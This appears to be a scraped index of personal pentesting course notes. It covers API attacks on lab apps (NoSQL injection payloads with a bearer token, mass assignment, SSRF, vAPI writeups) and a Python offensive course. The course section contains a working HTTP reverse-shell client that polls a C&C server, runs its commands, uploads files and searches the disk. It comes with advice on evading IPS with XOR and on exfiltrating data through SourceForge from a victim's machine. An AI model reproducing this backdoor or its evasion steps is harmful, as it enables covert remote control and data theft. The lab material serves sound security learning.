              POST /community/api/v2/coupon/validate-coupon HTTP/1.1\nhost: localhost:8888\naccept: */*\norigin: http://localhost:8888\nreferer: http://localhost:8888/shop\nConnection: close\nuser-agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\ncontent-type: application/json\nContent-Length: 29\nsec-fetch-dest: empty\nsec-fetch-mode: cors\nsec-fetch-site: same-origin\nAccept-Encoding: gzip, deflate\naccept-language: en-US,en;q=0.5\nAuthorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\nCache-Control: no-cache\nPostman-Token: 5eb2f69b-6f89-460b-a49f-96c12edc9906\n\n{\"coupon_code\":{\"$ne\":\"-1\"} }\n

              And this response:

              HTTP/1.1 200 OK\nServer: openresty/1.17.8.2\nDate: Mon, 06 Feb 2023 16:05:31 GMT\nContent-Type: application/json\nConnection: close\nAccess-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization\nAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE\nAccess-Control-Allow-Origin: *\nContent-Length: 79\n\n{\"coupon_code\":\"TRAC075\",\"amount\":\"75\",\"CreatedAt\":\"2022-11-11T19:22:26.134Z\"}\n

              We can use wfuzz like this:

              wfuzz -z file,/usr/share/wordlists/nosql.txt -H \"Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\" -H \"Content-Type: application/json\" -d \"{\\\"coupon_code\\\":FUZZ}\" --sc 200 -p localhost:8080 http://localhost:8888/community/api/v2/coupon/validate-coupon\n# -p localhost:8080 Redirect traffic to BurpSuite\n# --sc 200 Show code response 200\n
              ","tags":["api"]},{"location":"hackingapis/mass-assignment/","title":"Mass assignment","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#what-is-mass-asset-management","title":"What is mass asset management?","text":"

              Basically UserA is said in the frontend to have the ability to post/update an object and we use that request to post/update a different object. We are sending a request that updates or overwrites server-side variables.

              Example:

              In a login process you are said to be able to send these parameters:

              {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    }\n

              But you send this:

              {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    \"credit\":10000\n}\n

              And now, your new created user will have a credit of 10,000 units.

              Other other key-values that you could include in the JSON POST body could be:

              \"isadmin\": true,  \n\"isadmin\":\"true\",  \n\"admin\": 1,  \n\"admin\": true,\n

              Key thing is this vulnerability is to identify vectors and entrypoints.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#methodology","title":"Methodology","text":"

              Identify endpoints that accept user input in your collection and that have the potential to modify objects. In the crAPI application this was about taking a BFLA to the next level:

              • Changing the request \"GET /workshop/api/shop/products\" (which displays existing products) to a \"POST /workshop/api/shop/products\", the app responded with a 400 Bad request code, and provided information with suggested fields for a POST request. Basically this post request is a way to submit requests to alter or create store products. So, we can create our own product items.
              • Now we can create a product with a value in negative. Adquiring that item will give you credit!
              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#finding-mass-assignment-targets","title":"Finding Mass assignment targets","text":"

              To discover and exploit mass assignment vulnerabilities search for API requests that accept and process client input:

              1. Account registration

               - Intercept the web request\n- Craft this request with admin variables that you can set from API documentation\n

              2. Unauthorized access to organizations: If your user's objects belong to an organization with access to sensitive data, attempt to gain access to that organization.

              3. Resetting passwords, updating accounts, profiles or organizational objects: Do not limit yourself to the account registration process.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#tools","title":"Tools","text":"

              BurpSuite Intruder + Param Miner Arjun

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#using-param-miner-extension","title":"Using Param Miner extension","text":"

              1. Spotting sections focused on privileged actions. Some headers like:

              - Token: AdminToke\n-  Or in the json of the body: isadmin: true\n

              A nice way to do this is with Burp Extension: Param Miner.

              Param Miner can be downloaded from BApp Store in BurpSuite. To run it, right-click on a request (for instance, a request in Repeater and select Extensions>Param Miner>Guess params>Gues JSON parameter).

              Now, go to Extender tab> Extensions. And in the box below, select Output, and later \"Show in UI\":

              After a while you will see results from the attack.

              With Param Miner you can: fuzz unknown variables.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#arjun","title":"Arjun","text":"

              More about arjun.

              Arjun is a great tool for finding query parameters in URL endpoints.

              Advantages: - Supports GET/POST/POST-JSON/POST-XML requests. - It deals with rate-limits and timeouts.

              # Run arjun againts a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun}' --stable\n# -m Get method parameters GET/POST/JDON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

              Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

              ","tags":["api"]},{"location":"hackingapis/other-labs/","title":"Setting up the labs + Writeups","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              Here we'll be practising what we have learned in the course. There are plenty of labs in the wild. My intention here is to overview only the well known ones.

              Also, to make it to the end, I will include the writeups for every lab.

              ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-crapi","title":"Setting up crAPI","text":"

              Download it from: https://github.com/OWASP/crAPI

              mkdir ~/lab\ncd ~/lab\nsudo curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml\nsudo docker-compose pull\nsudo docker-compose -f docker-compose.yml --compatibility up -d\n
              ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-other-labs","title":"Setting up other labs","text":"

              Besides \"crapi\" and \"vapi\", the book \"Hacking APIs\" indicates some other interesting labs. Following chapter 5 of Hacking APIs book (\"Setting up vu\u00f1nerable API targets\"), I have installed:

              ","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-app","title":"vapi app","text":"

              Source: https://github.com/roottusk/vapi

              APIs have become critical element of security landscape. In 2019, OWASP released a list of top 10 API Security vulnerabilities for the first time. Vapi stands for Vulnerable Adversely Programmed Interface, and it's a self-hostable PHP Interface that mimics OWASP API Top 10 scenarios.

              Install

              # Under /home/kali/labs\ngit clone https://github.com/roottusk/vapi.git\ncd vapi\ndocker-compose up -d\n# prerrequisite: having docker up and running\n

              Setting up Postman

              • Go to https://www.postman.com/roottusk/workspace/vapi/
              • Locate and import vAPI.postman_collection.json in Postman
              • Locate and Import vAPI_ENV.postman_environment.json in Postman
              • Configure the collection to use vAPI_ENV
              ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-devslop-pixi","title":"OWASP DevSlop Pixi","text":"

              Pixi is a MongoDB, Express.js, Angular, Node (MEAN) stack web applica\u00adtion that was designed with deliberately vulnerable APIs.

              To install it:

              cd ~/lab.\ngit clone https://github.com/DevSlop/Pixi.git\n

              To run it:

              cd ~/lab\nsudo docker-compose up\n

              Now, in the browser, go to: http://localhost:8000/login

              ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-juice-shop","title":"OWASP Juice Shop","text":"

              Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications.

              To install, go to the github page (https://github.com/juice-shop/juice-shop) and follow the isntructions.

              To run it:

              sudo docker run --rm -p 3000:3000 bkimminich/juice-shop\n

              Now, in the browser, go to: http://localhost:3000/#/

              ","tags":["api"]},{"location":"hackingapis/other-labs/#damn-vulnerable-graphql-application","title":"Damn-Vulnerable-GraphQL-Application","text":"

              Damn Vulnerable Web Services is a vulnerable application with a web service and an API that can be used to learn about webservices/API related vulnerabilities.

              To install, see the github page: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application

              To run it:

              sudo docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga\n

              Now, in the browser, go to: http://localhost:5013/

              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeups","title":"Writeups","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-writeup","title":"VAPI Writeup","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api1","title":"Writeup: API1","text":"

              Tip provided by vAPI: Broken Object Level Authorization. You can register yourself as a User , Thats it ....or is there something more?

              Solution:

              • Postman: Under folder API0, send a request to Create User. When done, the vAPI_ENV will be filled with two more variables: api1_id, api1_auth.
              • Postman: Under folder API1, send a request to Get User. Initially you will get the user that you have created. BUT if you modify the api1_id in the vAPI_ENV environment, then you will receive the data from (let's say) user with id 1. Or 2. Or 3. Or... Tadam! BOLA.
              • The flag is in user with id 1. See the response body:
              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api2","title":"Writeup: API2","text":"

              Tip provided by vAPI: Broken Authentication. We don't seem to have credentials for this , How do we login? (There's something in the Resources Folder given to you).

              Solution:

              • Download creds.csv from https://raw.githubusercontent.com/roottusk/vapi/master/Resources/API2_CredentialStuffing/creds.csv.
              • Execute:
              cat creds.csv | cut -d, -f1 >users.txt\ncat creds.csv | cut -d, -f3 >pass.txt\n
              • Intercept in mode ON in Burp, enable foxyproxy at 8080 in the browser, and enable proxy in Postman at 8080.
              • Postman: Under folder API2, send a POST request to login and intercept it with Burp.
              • Burp: send the request to Intruder. Use Pitchfork attack with two payloads (Simplelist). One will be users.txt and second payload, pass.txt. Careful, remove the url encoding when setting up the payloads.
              • Burp: sort by Code (or length). You will get credentials for three users.
              • Postman: Login with the credentials of every user and save the file as an example just in case that you need to go back to this.
              • Postman: Once you are login into the app, a new enviromental variable has been saved in vAPI_ENV: api2_auth. With this authentication now we can resend the request Get Details. Flag will be in the response.
              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api3","title":"Writeup: API3","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api4","title":"Writeup: API4","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api5","title":"Writeup: API5","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api6","title":"Writeup: API6","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api7","title":"Writeup: API7","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api8","title":"Writeup: API8","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api9","title":"Writeup: API9","text":"

              On this lab we'll be testing for improper asset management. The endpoint provided in the Postman collection is:

              Several interesting things to test:

              • Only a pin code with 4 digits are required to login.
              • We are running this request using version2 of an api.
              • There are two significant headers:
                • X-RateLimit-Limit set to 5
                • X-RateLimit Remaining set to 4.

              With this in mind we can run that request six times, obtaining a 500 internal server error instead of the 200 response:

              But, if we run the same request but modifying the POST request from v2 to v1, then:

              Headers \"X-RateLimit-Limit\" and \"X-RateLimit Remaining\" are missing. Looks like there is no Rate limit set for this request and a Brute Force attack can be conducted. So we do it using Burp Intruder and... bingo! we have the flag:

              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api10","title":"Writeup: API10","text":"","tags":["api"]},{"location":"hackingapis/scanning-apis/","title":"Scanning APIs","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              Once you have discovered an API and used it as it was intended, you can proceed to perform a baseline vulnerability scan. Most of these scans return false-negative results (because they are web-oriented) but they are helpful in structuring next steps.

              Basic scans you can run:

              ","tags":["api"]},{"location":"hackingapis/scanning-apis/#nikto","title":"nikto","text":"

              You will get some results related to headers such as:

              • The anti-clickjacking X-Frame-Options header is not present.
              • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
              • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

              Run:

              nikto -h http://localhost:8888\n
              ","tags":["api"]},{"location":"hackingapis/scanning-apis/#owasp-zap","title":"OWASP zap","text":"

              To launch it, run:

              zaproxy\n

              You can do several things:

              • Run an automatic attack.
              • Import your spec.yml file and run an automatic attack.
              • Run a manual attack.

              The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

              ","tags":["api"]},{"location":"hackingapis/scanning-apis/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

              Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

              After that, OWASP Zap allows you to narrow the results to your target. How? In the Sites module, right click on your site and select \"Include in context\". After that, click on the icon shaped as a \"target\" to filter out sites by context.

              With the results, start your analysis and remove false-negative vulnerabilities.

              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/","title":"SSRF attack - Server side Request Forgery","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              This vulnerability allows an attacker to supply URLs that expose private data, scan the target's internal network, or compromise the target through remote code execution.

              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#identify-endpoints","title":"Identify endpoints","text":"

              Read your collection throughfully and search for requests that:

              • Include full URLs in the POST body or parameters
              • Include URL paths (or partial URLs)\u00a0in the POST body or parameters
              • Headers that include URLs like Referer
              • Allows for user input that may result in a server retrieving resources
              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#ssrf-types","title":"SSRF types","text":"","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#in-band-ssrf","title":"In-Band SSRF","text":"

              A URL is specified as an attack. The request is sent and the content of your supplied URL is displayed back to you in a response.

              A possible endpoint:

              {\n    \"inventory\":\"http://store.com/api/v3/inventory/item/12345\"\n}\n

              SSRF code:

              {\n    \"inventory\":\"http://maliciousserver.com\"\n}\n
              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#blind-ssrf","title":"Blind SSRF","text":"

              It's similar to In-Band attack. In this case, the response is returned and we do not have any indication that the server is vulnerable:

              HTTP/1.1 200 OK  \nheaders...  \n{}\n

              But, there is a way to test it. Burp Suite Pro has a great tool called Burp Suite Collaborator. Collaborator can be leveraged to set up a web server that will provide us with the details of any requests that are made to our random URL.

              ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#tools-to-test-blind-ssrf","title":"Tools to test Blind SSRF","text":"

              Free:

              • https://webhook.site
              • http://pingb.in/
              • https://requestbin.com/
              • https://canarytokens.org/

              Paid:

              • Burp Collaborator.
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/","title":"Setting up the environment","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              For this course, I'll use a Kali machine installed on VirtualBox. I downloaded last .ova version, 2022-3.

              After that, follow these steps:

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#1-install-a-kali-ova-on-virtualbox","title":"1. Install a kali ova on VirtualBox","text":"

              For this course I've downloaded a Kali .ova machine. I will be using VirtualBox and I will modify these elements in the ova installation:

              • 4GB RAM
              • Bridge mode Interface
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#2-update-our-system","title":"2. Update our system","text":"
              sudo apt update -y\nsudo apt upgrade -y\nsudo apt-dist upgrade -y\n

              Also, update credentials:

              sudo passwd kali\u00a0 \u00a0 (enter in a new more complex password)\nsudo useradd -m hapihacker\nsudo usermod -a -G sudo hapihacker\nsudo chsh -s /bin/zsh hapihacker\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#3-install-burp-suite-and-make-sure-that-is-up-to-date","title":"3. Install Burp Suite and make sure that is up-to-date.","text":"
              sudo apt-get install burpsuite -y\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#4-adding-extension-authorize-extension-to-burpsuite-this-will-require-to-have-jython-installed","title":"4. Adding extension Authorize extension to BurpSuite: this will require to have Jython installed.","text":"
              1. Download jython from: https://www.jython.org/download.html and add the .jar file to the Extender Options.
              2. Under the Extender BApp Store search for Autorize and install the extension.
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#5-install-foxy-proxy-in-firefox-to-proxy-the-traffic-to-burpsuite-and-postman-once-intalled-well-set-up-manually-two-proxies","title":"5. Install Foxy-proxy in Firefox to proxy the traffic to BurpSuite and Postman. Once intalled, we'll set up manually two proxies","text":"
              1. Postman - 127.0.0.1 - 5555
              2. BurpSuite - 127.0.0.1 - 8080.

              Download BurpSuite certificate and have it installed in Firefox.

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#6-mitmweb-certificate-setup","title":"6. MITMweb certificate setup","text":"
              1. Install mitmweb from the terminal:
              mitmweb\n

              We need to make sure that Burpsuite is stopped, since mitmweb is also going to use port 8080.

              1. Activate FoxyProxy in Firefox to send traffic \u00a0to the BurpSuite proxy (8080).

              2. Download mitmproxy-ca-cert.pem from mitm.it (in Firefox) and have it installed in Firefox.

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#7-install-postman","title":"7. Install Postman","text":"
              sudo wget https://dl.pstmn.io/download/latest/linux64 -O postman-linux-x64.tar.gz &&\u00a0sudo tar -xvzf postman-linux-x64.tar.gz -C /opt &&\u00a0sudo ln -s /opt/Postman/Postman /usr/bin/postman\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#8-install-mitmproxy2swagger","title":"8. Install mitmproxy2swagger","text":"
              cd /opt\nsudo pip3 install mitmproxy2swagger\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#9-install-git","title":"9. Install git","text":"
              cd /opt\nsudo apt-get install git\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#10-install-docker","title":"10. Install docker","text":"
              cd /opt\nsudo apt-get install docker.io docker-compose\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#11-install-go","title":"11. Install Go","text":"
              cd /opt\nsudo\u00a0apt install golang-go\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#12-install-json-web-token-toolkit-v2","title":"12. Install JSON Web Token Toolkit v2","text":"
              cd /opt\nsudo git clone\u00a0https://github.com/ticarpi/jwt_tool\ncd jwt_tool\npython3 -m pip install termcolor cprint pycryptodomex requests\n\n# Optional: Make an alias for jwt_tool.py**\nsudo chmod +x jwt_tool.py\nsudo ln -s /opt/jwt_tool/jwt_tool.py /usr/bin/jwt_tool\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#13-install-kiterunner","title":"13. Install Kiterunner","text":"
              sudo git clone https://github.com/assetnote/kiterunner.git\ncd kiterunner\nsudo make build\nsudo ln -s /opt/kiterunner/dist/kr /usr/bin/kr\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#14-install-arjun","title":"14. Install Arjun","text":"

              More about arjun.

              sudo git clone\u00a0https://github.com/s0md3v/Arjun.git\n
              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#15-install-owasp-zap","title":"15. Install OWASP ZAP","text":"
              sudo apt install zaproxy\n

              Run ZAP and open the \"Manage Add-ons\" option and make sure that the add-on \"OpenAPI Support\" is marked to be updated.

              ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#16-have-these-useful-wordlist-api-oriented","title":"16. Have these useful wordlist API oriented","text":"
              # SecLists https://github.com/danielmiessler/SecLists\nsudo\u00a0wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\  \n&& sudo unzip SecList.zip \\  \n&& sudo rm -f SecList.zip\n\n# Hacking-APIs https://github.com/hAPI-hacker/Hacking-APIs\nsudo\u00a0wget -c\u00a0https://github.com/hAPI-hacker/Hacking-APIs/archive/refs/heads/main.zip\u00a0-O HackingAPIs.zip \\  \n&& sudo unzip HackingAPIs.zip \\  \n&& sudo rm -f HackingAPIs.zip\n
              ","tags":["api"]},{"location":"python/bypassing-ips-with-handmade-xor-encryption/","title":"Bypassing IPS with handmade XOR Encryption","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              The idea is to encrypt our traffic to avoid network analyzers or intrusion prevention sensors. SSL or SSH is not recommended here since Next Generation Firewalls have the ability to decrypt them and pass it as plain text to the IPS, where it will be recognized.

              • Create a secret key of 1Kb that matches the size of the socket, to make a XOR operation to encrypt the message
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n# The random and string libraries are used to generate a random string with flexible criteria\nimport string\nimport random\n\n\n# Random Key Generator\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n\nprint(key)\n\nprint (\"\\n\" + \"Key length = \" + str(len(key)))\n\nmessage = 'ipconfig'\nprint(\"Msg: \" + message + '\\n')\n\n\n# here i defined a dedicated function called str_xor, we will pass two values to this fucntion, the first value is the message(s1) that we want to encrypt or decrypt, and the second paramter is the xor key(s2). We were able to bind the encryption and the decryption phases in one function because the xor operation is exactly the same when we encrypt or decrpyt, the only difference is that when we encrypt we pass the message in clear text and when we want to decrypt we pass the encrypted message\n\n\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\n\n# first we split the message and the xor key to a list of character pair in tuples format >>  for (c1,c2) in zip(s1,s2)\n\n# next we will go through each tuple, and converting them to integer using (ord) function, once they converted into integers we can now perform exclusive OR on them  >>  ord(c1) ^ ord(c2)\n\n# then convert the result back to ASCII using (chr) function  >>  chr(ord(c1) ^ ord(c2))\n# last step we will merge the resulting array of characters as a sequqnece string using >>>  \"\".join function \n\nenc = str_xor(message, key)\n\nprint(\"Encrypted message is \" + \"\\n\" + enc + \"\\n\")\n\ndec = str_xor(enc, key)\nprint(\"Decrypted message is \" + \"\\n\" + dec + \"\\n\")\n

              To integrate XOR encryption into this client side Python script, you can modify the script to encrypt and decrypt the communication between the client and the server using the XOR encryption algorithm.

              Here is an example of how to modify the script to incorporate XOR encryption:

              import string\nimport random\nimport requests\nimport os\nimport subprocess\nimport time\n\n# Random Key Generator\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n# Define XOR function\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\nwhile True:\n    # Send GET request to C&C server to get command\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n\n    # If command is to terminate, break out of loop\n    if 'terminate' in command:\n        break\n\n    # If command is to grab a file and send it to the C&C server\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    # If command is to search for files with a specific extension\n    elif 'search' in command:\n        # Split command into path and file extension\n        command = command[7:] #cut off the the first 7 character ,, output would be  C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # here we define a string where we will append our result on it\n\n        # Walk through directories and search for files with specified extension\n        for dirpath, dirname, files in os.walk(path):\n            for file in files:\n                if file.endswith(ext):\n                    lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n\n    # If command is a shell command, execute it and send output to the C&C server\n    else:\n        # Encrypt command with XOR key\n        enc = str_xor(command, key)\n\n        # Execute encrypted command and capture stdout and stderr\n        CMD = subprocess.Popen(enc, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stdout.read(), key))\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stderr.read(), key))\n\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","ips","xor encryption"]},{"location":"python/bypassing-next-generation-firewalls/","title":"Bypassing Next Generation Firewalls","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              Corporate firewall (Next Generation Firewalls) can block traffic based on the reputation of the target IP/url. This means that once we achieve to execute the malicious client side script on the victim's machine, this next generation firewall might block/defer the connection if the reputation or the rank of the target URL/IP belongs to a pool of resources supplied by the vendor and it's categorized as low.

              To overcome this filter, modern malware is using trusted targets.

              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-source-forge-for-data-exfiltration","title":"Using Source Forge for data exfiltration","text":"

              1. Signup in Source Forge

              You will get credentials for configuring your SFTP agent in step 3.

              2. Install filezilla. It will work as our SFTP agent:

              sudo apt-get install filezilla\n

              3. Configure filezilla and connect.

              Host: web.sourceforge.net\nusername: usernameinSourceForge\npassword: passwordinSourceForge\nport: 22\n

              4. Install these two python libraries on the victim's machine: paramiko and scp.

              pip install paramiko\npip install scp\n

              5. Run the script on the victim's machine:

